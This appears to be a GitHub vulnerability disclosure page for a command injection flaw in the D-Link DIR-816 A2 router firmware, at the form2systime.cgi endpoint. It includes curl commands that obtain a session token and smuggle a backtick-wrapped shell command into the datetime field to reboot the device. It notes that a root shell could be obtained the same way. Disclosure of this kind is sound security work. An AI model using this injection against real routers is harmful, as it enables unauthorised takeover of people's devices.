Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
IOT_Vul/dlink/Dir816/form2systime_cgi/
IOT_Vul/dlink/Dir816/form2systime_cgi/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

D-link DIR-816 A2_v1.10CNB04.img Command injection vulnerability

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

In /goform/form2systime.cgi, the Command injection vulnerability only needs to be met by datetime -:

Poc

First you need to get the tokenid

curl http://192.168.0.1/dir_login.asp | grep tokenid

Next, run the following poc, you can see that the router is restarted

curl -i -X POST http://192.168.0.1/goform/form2systime.cgi -d tokenid=xxxxx -d 'datetime=`reboot`-:'

Finally, exp can be written to achieve the effect of obtaining a root shell